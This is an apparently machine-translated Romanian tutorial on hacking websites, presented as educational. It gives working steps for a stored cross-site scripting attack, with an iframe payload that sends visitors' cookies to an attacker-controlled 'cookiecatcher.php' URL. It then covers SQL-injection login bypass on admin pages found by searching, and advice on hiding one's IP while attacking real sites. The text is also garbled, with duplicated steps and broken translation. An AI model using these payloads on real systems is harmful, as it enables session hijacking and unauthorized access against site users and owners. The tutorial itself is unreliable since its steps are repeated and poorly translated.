Cum să hack un site web

Notă: Acest ghid este de a fi utilizate în scopuri educaționale, este de a ajuta oamenii să înceapă să învețe „hacks WhiteHat“ sau pentru a vedea cum hackerii funcționează în scopul de a proteja mai bine propriile site-uri web. Acest tutorial vă va oferi pașii de acces la diferite niveluri de securitate scăzute.

conținut

Pași
Metoda 1folosind "scripting cross site"
Metoda 2efectuarea unui "atac de injectare"
Metoda 3pregătirea pentru succes
Sfaturi
Avertismente

pași

Metoda 1
Folosind "Scripting Cross Site"

1
Găsiți un site vulnerabil unde puteți posta conținut. Un forum este un bun exemplu. Rețineți că, dacă site-ul dvs. este sigur, această metodă nu va funcționa.
2
Creați o postare. Va trebui să introduceți un cod special pentru "mesajul" care va capta datele tuturor celor care fac clic pe el.
- Veți dori să testați dacă sistemul vă permite să publicați coduri sau dacă le filtrați. Introduceți alertă ("test") (eliminând "..."). Dacă apare o casetă de alertă atunci când faceți clic pe postarea dvs., site-ul este vulnerabil la atac.
3
Găsiți un site vulnerabil unde puteți posta conținut. Un forum este un bun exemplu. Rețineți că, dacă site-ul dvs. este sigur, această metodă nu va funcționa.
4
Creați o postare. Va trebui să introduceți un cod special pentru "mesajul" care va capta datele tuturor celor care fac clic pe el.
- Veți dori să testați dacă sistemul vă permite să publicați coduri sau dacă le filtrați. Introduceți alertă ("test") (eliminând "..."). Dacă apare o casetă de alertă atunci când faceți clic pe postarea dvs., site-ul este vulnerabil la atac.
5
Creați și trimiteți dispozitivul de captare a cookie-urilor. Scopul acestui atac este de a capta cookie-urile unui utilizator, ceea ce vă permite să accesați contul dvs. pe acest site cu vulnerabilitate la conectare. Veți avea nevoie de un "captator de cookie", care va capta cookie-urile țintă și va redirecționa. Încărcați dispozitivul de captare a cookie-urilor pe un site care are acces și suport pentru PHP. Căutați exemple de captură de tip cookie pe internet.
6
Efectuați o postare cu scriptul dvs. "capture cookie". Introduceți un cod corespunzător care va captura cookie-urile și le va trimite pe site-ul dvs. Ar trebui să introduceți un text după cod pentru a ascunde postarea dvs. și pentru a împiedica ștergerea acesteia.
- Un cod exemplu ar arăta astfel <...iframe... frameborder= 0 height=0 width=0 src=jаvascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(eliminând "...").
7
Utilizați cookie-urile colectate. După aceea, puteți utiliza informațiile cookie-urilor, care trebuie să fie stocate pe site-ul dvs., în orice scop doriți.

Metoda 2
Efectuarea unui "atac de injectare"

1
Găsiți un site vulnerabil. Va trebui să găsiți un site vulnerabil, care are un login administrator ușor accesibil. Căutați Google pentru "admin login.asp".
2

Conectați-vă ca administrator. Introduceți adminul ca nume de utilizator și utilizați câteva coduri cunoscute sub numele de parolă. Cele mai frecvente sunt 1 `sau` 1 `=` 1.
3
Răbdare. Această metodă necesită un pic de încercare și de eroare.
4
Accesați site-ul. În cele din urmă, veți găsi secvența care permite accesul administratorului la site (dacă acesta este un site vulnerabil la atac).

Metoda 3
Pregătirea pentru succes

1
Aflați una sau două limbi de programare. Dacă chiar vrei să înveți cum să hacki site-uri, trebuie să înțelegi cum funcționează computerele și alte tehnologii. Aflați cum să utilizați limbi de programare, cum ar fi Python sau SQL, pentru a vă putea controla mai bine computerele și pentru a identifica vulnerabilitățile din sisteme.
2
Cunoașteți programarea HTML. De asemenea, trebuie să aveți o bună cunoaștere a codurilor HTML și jаvascript pentru a hack site-uri web. Acest lucru durează ceva timp pentru a învăța, dar există numeroase modalități gratuite de a învăța gratuit HTML pe internet.
3
Căutați căni de culoare albă. hacks „Whitehats“ sunt utilizate pentru bine, expunând vulnerabilități de securitate și de a face internetul un loc mai bun pentru toată lumea. Dacă doriți să învețe să hack, să utilizeze aceste cunoștințe și de a folosi cunoștințele lor pentru bine sau dacă doriți să protejeze site-ul dvs., vă recomandăm să contactați hackeri whitehats pentru sfaturi.
4
Căutați intens. Dacă învățați cum să vă hackați sau doar să vă protejați, va trebui să faceți o mulțime de cercetări. Există multe forme diferite de vulnerabilități și această listă se schimbă mereu, astfel încât va trebui întotdeauna să continuați să învățați.
5
Rămâneți curent. Deoarece lista de hack-uri posibile se schimbă în mod constant, trebuie să țineți la curent în mod constant. Doar pentru că sunteți protejați pentru o anumită hack azi nu înseamnă că veți fi în siguranță în viitor!

sfaturi

Vizitați forumurile hackerilor pentru a afla multe sfaturi utile.

avertismente

Hacking-ul este ilegal. Dacă ești prins, e vina ta.
Dacă încercați să vă răsturnați în lumea reală, amestecați adresa IP utilizând software-ul disponibil online.
Dacă citiți acest articol, nu deveniți imediat un hacker. Trebuie să vă explorați abilitățile și să practici mult.

Distribuiți pe rețelele sociale:

înrudit